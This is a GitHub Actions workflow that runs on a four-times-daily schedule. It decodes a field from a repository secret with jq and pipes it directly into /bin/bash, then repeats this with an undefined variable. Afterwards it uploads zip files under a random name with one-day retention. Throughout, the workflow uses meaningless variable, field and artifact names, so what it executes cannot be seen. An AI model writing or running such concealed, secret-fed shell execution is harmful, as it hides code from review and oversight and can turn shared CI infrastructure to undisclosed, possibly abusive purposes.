name: fuxiangrongliang
on:
  workflow_dispatch:

  schedule:
    - cron: '46 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fuxiangrongliang
        env:
          vkwr202: ${{ secrets.vkwr202 }}
        run: |
          printf '%s' "$vkwr202" | jq -r .tc69 | /bin/bash
          echo $qfkb322 | jq -r .u30 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Zv9mjQz8
          path: "*.zip"
          retention-days: 1
